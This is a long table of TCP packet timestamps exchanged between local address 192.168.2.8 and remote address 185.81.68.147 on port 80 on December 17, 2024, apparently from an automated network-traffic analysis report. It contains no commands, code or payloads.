                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.127334118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.131694078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.131705999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.131850958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.136682987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.136696100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.136862993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.141468048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.141644955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.141747952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.253582001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.253607035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.253835917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.255863905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.255928040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.256098986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.259259939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.259370089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.259572983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.263725042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.263782024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.263981104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.268486023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.268536091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.268685102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.272597075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.272727013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.272886992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.276753902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.276855946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.277014971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.280999899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.281174898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.281686068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.285125017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.285216093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.285444021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.289319992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.289398909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.289551020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.293539047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.293930054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.294094086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.297867060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.297975063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.298088074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.301816940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.301958084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.302103043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.306018114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.306168079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.306454897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.310142040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.310270071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.310414076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.314338923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.314409971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.314785957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.318562984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.318711996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.318842888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.322724104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.322808027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.322927952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.326838970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.326931953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.327052116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.331010103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.331110954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.331325054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.335177898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.335329056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.335788965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.339339018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.339420080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.339713097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.343580008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.343713999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.343862057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.347881079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.348040104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.348234892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.351877928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.351980925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.352170944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.356033087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.356127024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.356293917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.360215902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.360297918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.360457897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.448020935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.448065042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.448540926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.449712038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.449856043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.450753927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.453151941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.453262091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.453980923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.456943035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.457026005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.457309008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.460246086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.460325003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.460491896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.463393927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.463464975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.464087009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.466708899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.466789007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.466943026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.470175028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.470206976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.470521927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.473033905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.473140001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.473445892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.476479053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.476594925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.476728916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.479372978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.479512930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.479664087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.482167006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.482289076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.482358932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.485153913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.485436916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.486015081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.488008022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.488116980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.488221884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.490885973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.491024017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.491147995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.493699074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.493798018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.493999004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.496519089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.496797085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.498030901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.499427080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.499506950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.499566078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.502309084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.502424002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.502489090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.505172968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.505225897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.505425930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.508409977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.508460999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.508563995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.510845900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.510890007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.511094093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.513760090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.513813972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.513879061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.516592979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.516777992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.516896009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.519454956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.519562006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.519618034 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.522314072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.522528887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.522574902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.525183916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.525358915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.525487900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.528031111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.528209925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.528297901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.530916929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.531002998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.531085968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.533732891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.533859015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.533978939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.536652088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.536725044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.538000107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.539480925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.539589882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.542005062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.542329073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.542459965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.545216084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.545325994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.545950890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.546103954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.548085928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.548219919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.548435926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.551059008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.551211119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.551893950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.553798914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.553915977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.554109097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.556904078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.556940079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.557082891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.559505939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.559609890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.561948061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.562371969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.562486887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.562635899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.565217972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.565336943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.568084955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.568109035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.568154097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.568850994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.570959091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.571043968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.571362972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.573807001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.573914051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.574085951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.576792002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.576920033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.577869892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.579562902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.579664946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.580058098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.582396030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.582504988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.582621098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.637556076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.637574911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.637799978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.638679981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.639067888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.639117002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.639158010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.641514063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.641614914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.641741037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.643856049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.643968105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.644251108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.646138906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.646356106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.646477938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.648401022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.648437023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.648454905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.650616884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.650665998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.650856972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.652829885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.652956963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.653132915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.654948950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.655009031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.655103922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.657124996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.657233000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.657242060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.659138918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.659233093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.659307957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.661242962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.661293030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.661395073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.663264990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.663306952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.663362026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.665441036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.665566921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.665951967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.667726040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.667741060 CET8049709185.81.68.147192.168.2.8
